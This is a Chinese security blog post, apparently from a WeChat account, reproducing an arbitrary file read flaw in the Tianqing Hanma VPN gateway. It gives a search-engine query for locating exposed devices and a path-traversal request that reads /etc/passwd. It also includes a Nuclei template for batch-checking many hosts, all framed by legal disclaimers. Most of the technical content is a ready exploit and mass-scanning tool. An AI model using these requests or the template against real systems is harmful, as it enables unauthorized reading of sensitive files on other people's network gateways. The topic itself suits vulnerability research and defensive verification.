声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
公众号现在只对常读和星标的公众号才展示大图推送,建议把公众号设为星标,否则可能就看不到啦!感谢各位师傅。
资产收集
app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
漏洞复现
发送请求
GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1Host:
返回包
批量验证脚本
id: ZH-2024-07-16-001
info:
name: 天清汉马VPN安全网关系统存在任意文件读取漏洞
author: god
severity: low
http:
- raw:
- |+
@timeout: 30s
GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
User-AgentMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- root
原文始发于微信公众号(Devil安全):【漏洞复现】天清汉马VPN安全网关系统存在任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论